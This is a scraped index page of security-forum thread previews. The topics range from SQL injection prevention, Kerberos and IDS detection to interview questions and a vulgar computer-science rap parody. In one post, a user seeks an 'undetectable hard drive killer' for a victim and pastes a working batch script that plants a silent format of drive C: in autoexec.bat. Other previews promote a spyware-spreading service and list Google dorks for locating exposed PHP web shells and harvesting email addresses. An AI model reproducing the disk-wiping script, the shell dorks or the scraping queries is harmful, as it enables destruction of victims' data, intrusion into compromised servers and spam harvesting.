Technical Discussion
What's your take on Face Recognition Technology?
Some of the Lenovo notebooks are coming with face recognition software, which is actually a reemergence of an old idea. Now that some systems include integrated cameras with much better quality (1.3MP), facial recognition has become much better. In practice this works very well and is extremely fast at recognition.
The included software lets you log onto your Windows account simply by sitting in front of your system. Your face is your password.
List of Useful Information Security Related RSS Feeds
As a security engineer, it is required that we keep ourselves abreast of new vulnerabilities, exploits and ongoing research in the domain. RSS solves this problem by allowing web-users to easily stay informed by retrieving the latest content from the sites they’re interested in. Time is also saved by not needing to visit each site individually. Moreover, privacy is ensured because users don’t have to join each sites email newsletter.
Let’s use this thread to list high value Infosec feeds :-)
NBAD (Network Behavior Anomaly Detection) the technology not to need Patten to detect worm
Very many Netflow report product when very big network current capacity, probably is the 150Mbps demonstration report form speed is very slow in MRTG chart, its main reason is using SQL or My SQL collects packet, if voluntarily develops develops the algorithm to collect network packet then Netflow the report demonstration report form speed can be very quick; Example 1.Arbor Network Corporation's Peak Flow X product 2.Lancope Corporation's Stealth Watch product 3.Mazu Network Corporation's Mazu Profiler product 4.Curelan Corporation's Flowview the FM product, first three are the American
Spyware/adware spreading service
Installing "applications" on thousands of computers for money. Definitely evil.
http://www.spreadthatfile.com
learning content
Hi All
HDK
HI
I AM LOOKING UNDETACTABLE HARD DRIVE KILLER. IF ANY ONE HAVE THEN PLEASE SHARED WITH ME.
IF ANY ONE HAVE ANY DIFFERENT IDEA HOW TO DESTROY MY VICTIM HDD THEN PLEASE ALSO SHARE
I HAVE HARD DRIVE KILLER BUT NOW ITS DETECTED BY ANY ANTI VIRUSES
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
Windows 98 Support for MP3 Player
I'm running Windows 98 my MP3 Player isn't supported.
Any tricks that might work to allow me to download music?
LFI using php injected JPG
Can someone please explain to me what this guy (Codebreak) is doing
Seriously I don't get it, it looks insane. Now this might be unrelated but I was reading through a forum the other day and they were talking about; getting "r00t" (which I understand), & php Shells (like c99..). What are they on about? someone please put me out of my misery.. :D
Thanks in advance for any explanation you can give me.
-tele'-
need help to convert MASM code to ASM 8086 code
Could anybody help me to convert this code to ASM 8086 code.
Aku wt pki MASM32 (www.masm32.com)
; Build this with the "Project" menu using
; "Console Assemble & Link"
.486 ; create 32 bit code
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive
include D:\masm32\include\windows.inc ; always first
8086 asm help needed
Hey guys, I've a lab exam on wenesday in assembly language programming. Our lecturer gave us a program to practise with, but I just can't get it. I've been trying for a good hour and a half, and nothing is working. Can anybody help me with this problem:-
Write an 8086 assembly language program that will compute:
2.0 * log10 X for x = 0.1, 1.0, 10.0, 100.5, 1000.0, and six other values using a loop.
All values are in the single-precision (short real) format
Operating System Developmnt
Hi all,
i want to know more about OS development.
if any one have idea about that, please help.
Preventing sql injection
Can anyone please explain how sql injection can be preventing.
I know filtering the contents at the server side is one of the solution. Filtering characters such as (<,>,', OR,1,= )
There is a possibility few of the webapps may treat these characters as legitimate. For example user name may have O' rilly.
In this case you cant filter the (') character as its a part of the user name.
Understanding Kerberos authentication
Hi
can anyone please explain how kerberos authentication works with a windows environment. I know Kerberos is an integral part of Active directory.
But i want to know the insight of how the authentication is taking place as well as how the Ticket grading server is working within a windows environment.
The ethical dilemmas of robotics ( Laws of Robotics )
If the idea of robot ethics sounds like something out of science fiction, think again, writes Dylan Evans.
Scientists are already beginning to think seriously about the new ethical problems posed by current developments in robotics.
This week, experts in South Korea said they were drawing up an ethical code to prevent humans abusing robots, and vice versa. And, a group of leading roboticists called the European Robotics Network (Euron) has even started lobbying governments for legislation.
What is QOS and why its a big deal these days ?
QOS ( Quality of Service ) which allows to manage network traffic in a cost-effective manner to enhance user experience in home and enterprise environments. QOS allows network engineers to measure bandwidth, detect changing network conditions such as congestion.
It has been there for a long time, then why suddenly it has become a media concern ?
Firewall Interview Questions
Recently, I gave an interview for network security engineer and these Firewall questions were asked. For the benefit of SecGuru readers I am posting the questions here.
- Firewall, what is that, how it works, how it is diff from ACLs?
- Describe, generally, how to manage a firewall?
- What is a Denial of Service attack and its safeguards?
- What is a “spoofed” packet?
- What is a SYN Flood?
- What is an Application Layer Firewall?
Computer Science Department's Rap Song
Yo, MC Plus Plus, my rhymes are so phat,
I'm PSPACE-complete but I'll reduce you to 3-SAT.
My crew is so hard that we roll in NP,
And bitches dereference my pointer for free.
When I'm linear probing they're like, "Damn that's gigantic,"
I showed it to your mom and she used Hoare semantics.
She jumped like JNE up onto my erection
And I picked up that ho like straight garbage collection.
("That's right, mark-and-sweep on these nuts, bitch.")
My lyrics get stolen by sucker MCs,
I gotta sign my rhymes with PGP;
But I keep on generatin' like a CFG
What type of programmer are you?
I just gave a programmer personality test, the site states "Programmer's personality test is based of the Myers-Briggs Personality Test and has been changed to relate to your programming personality type. This is not a joke test and is really only relevant to programmers, however anyone is welcome to take the test. There are 12 questions with 2 answers for each question and you must choose one answer from each and every question. There are no 'right' or 'wrong' answers, your answer will simply show what type of personality you have."
Five Tips for Making Progress in Your Career While Staying Put
Most professionals think they have to change jobs every three years to get ahead. But you really don’t have to move to a new job or company to advance your career. Chances are, your current job offers challenges and opportunities you haven’t yet tapped. By taking on new assignments in your current position, you can expand your skill set and develop your leadership capabilitiesâ€â€and thus your marketabilityâ€â€without spending all that time and effort job-hunting.
Buffer Overflow - Easy to understand primer
Every week, there are security vulnerabilities reported in widely deployed softwares. Many of these threats are buffer-overflow exploitation using which a malicious user could gain control of a computer system by crafting a special input data. These buffer overflows are found in web-browsers, web-servers and all other types of programs and services. No doubt, buffer overflow is a serious threat to system and data integrity.
Difference between Signature Based and Anomaly Based Detection in IDS
Recently, I have started working with IDS and noticed a lot of debate over anomaly based and signature based approach. Majority of the commercial products are based on signatures which examine the traffic looking for well known patterns of attack. This means that for every vulnerability and exploit technique, the IDS engineer would code a pattern match for the IDS system. An example for this would be to detect every packet on the wire for the pattern "/cgi-bin/phf?", which might indicate somebody attempting to access this vulnerable CGI script on a web-server.
honeypots anyone?
hey
Anyone hosting honeypots now or then ? If so could you give me some advices on what software would be best to get one running?
my biggest interest is in php flaws.....
Thanks in advance
e.
google dork's
well if someone want to share with some of his own or what he found on net this is the right place:
php shells / yes i know most of them will be honeypots but we got proxy's right? ;) :
- intitle:"PHP Shell *" "Enable stderr" filetype:php
- PHPKonsole PHPShell filetype:php -echo
- "inurl:[name of shell]"
want some mail adressess?
+NOSPAM@hotmail.com | +NOSPAM@gmail.com | +NOSPAM@yahoo.com
"* at * dot com" | "* at * dot net" | "* at * dot uk" | "* at * dot mx"
etc. etc.
....
to be continued...
e.
Recent Comments
5 days 5 hours ago
5 days 5 hours ago
5 days 8 hours ago
6 days 15 min ago
6 days 9 hours ago
1 week 1 day ago
1 week 1 day ago
1 week 3 days ago
1 week 5 days ago
2 weeks 1 day ago